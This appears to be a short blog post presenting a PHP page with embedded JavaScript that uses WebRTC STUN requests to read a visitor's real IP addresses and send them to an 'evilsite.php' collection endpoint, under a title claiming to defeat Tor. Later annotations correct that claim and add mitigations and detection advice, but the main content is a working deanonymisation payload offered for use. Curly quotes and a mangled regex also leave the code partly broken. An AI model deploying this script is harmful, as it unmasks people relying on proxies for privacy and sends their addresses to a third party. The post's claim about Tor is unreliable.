Sleep
1 min readApr 22, 2022

How to bypass a Tor exit node and pull a user's IP

<!DOCTYPE html>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8">
</head>
<body>

<?php
// Turn off PHP error reporting for this request.
error_reporting(0);
// Remove the execution time limit (0 means no limit).
set_time_limit(0);
// Apply the same two settings through ini_set: errors are not displayed
// and max_execution_time is unlimited.
ini_set(‘display_errors’, 0);
ini_set(‘max_execution_time’, 0);

/*
$exploit = “
<script type=’text/javascript’>
// Runs once at load, before any address is known: requests the collection
// URL with the literal placeholder text [ IP START ] as the IP value.
// NOTE(review): nothing in this script interacts with a Tor exit node. Every
// address it reports is read inside the visitor's own browser through WebRTC
// (see getIPs), so the exposure depends on the browser configuration.
httpGet(‘http://localhost/evilsite.php?IP=[ IP START ]’) // start marker sent to the collection endpoint
//get the IP addresses associated with an account

// last address passed to envior, stored with a separator prefix
var ip2 = ‘’;
// getIPs(callback): starts WebRTC ICE candidate gathering and calls
// callback(ip) once for each distinct IPv4-looking string found in a candidate.
//
// Defender notes:
// - ICE candidates describe the network addresses of the browser itself. The
//   STUN lookup that yields the public address uses UDP, which a browser that
//   is only pointed at a SOCKS or HTTP proxy does not necessarily send through
//   that proxy. That is the whole leak; no permission prompt is involved.
// - Tor Browser ships with WebRTC disabled, so this listing concerns ordinary
//   browsers that were manually configured to use a Tor proxy.
// - Mitigations: Firefox pref media.peerconnection.enabled = false; Chrome
//   policy WebRtcIPHandling set to disable_non_proxied_udp. Current browsers
//   also replace local host addresses in candidates with mDNS names.
// - Detection: a page with no real-time communication feature that creates an
//   RTCPeerConnection and contacts a STUN server is worth investigating.
function getIPs(callback) {
// addresses already reported, used as a set keyed by address
var ip_dups = {};

//compatibility for firefox and chrome
// picks the unprefixed constructor first, then the vendor-prefixed ones
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
// NOTE(review): RtpDataChannels and a second constructor argument look like
// legacy, non-standard options; confirm against the targeted browser versions
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};

//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{‘url’: ‘stun:stun.services.mozilla.com’}]
var servers = undefined;

//add same stun server for chrome
// only set when the webkit-prefixed constructor exists
if (window.webkitRTCPeerConnection)
servers = {iceServers: [{urls: ‘stun:stun.services.mozilla.com’}]};

//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);

//listen for candidate events
pc.onicecandidate = function(ice) {

//skip non-candidate events
if (ice.candidate) {

//match just the IP address
// takes the first dotted-quad match from the candidate line
var ip_regex = /([0–9]{1,3}(\.[0–9]{1,3}){3})/;
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

//remove duplicates
// callback fires only the first time an address is seen
if (ip_dups[ip_addr] === undefined)
callback(ip_addr);

ip_dups[ip_addr] = true;
}
};

//create a bogus data channel
// the channel is never used; it is created before the offer is requested
pc.createDataChannel(‘’);

//create an offer sdp
// callback form of createOffer: success handler first, failure handler second
pc.createOffer(function(result) {

//trigger the stun server request
// both handlers passed to setLocalDescription are empty, so success and
// failure are ignored here
pc.setLocalDescription(result, function() {
}, function() {
});

// createOffer failure handler is empty as well: errors are dropped silently
}, function() {
});
}

// Start gathering and forward every distinct address to envior. Despite the
// original wording, nothing is inserted into the page at this point; envior
// sends the value to the collection endpoint.
getIPs(function(ip) {
envior(ip); // sub-process: report this address
}
);

// Send a GET request.
// httpGet(url): performs a synchronous XMLHttpRequest GET to url and returns
// the response body as text. The third argument to open() is false, so the
// call blocks page script until the response arrives.
// Defender note: every value placed in url travels in the query string, so it
// is visible in proxy logs and in the access log of the receiving server.
function httpGet(url)
{
var xmlHttp = null;

xmlHttp = new XMLHttpRequest();
xmlHttp.open(‘GET’, url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
}

// envior(valor): stores valor in the outer variable ip2 with a separator
// prefix, sends it to the collection URL as the IP query value, and writes
// the response of that request into the document.
function envior(valor) {
ip2 = ‘ — ‘ + valor.toString();
// document.write inserts whatever the server returns as markup, unescaped
document.write(httpGet(‘http://localhost/evilsite.php?IP=’ + ip2));

// NOTE(review): the claim below overstates the effect. Tor Browser ships with
// WebRTC disabled; only browsers with WebRTC enabled expose candidates.
//Tor will never be the same
//We out here cuz
}
</script>”;

// Output the markup and script held in $exploit as part of the page response.
echo $exploit;
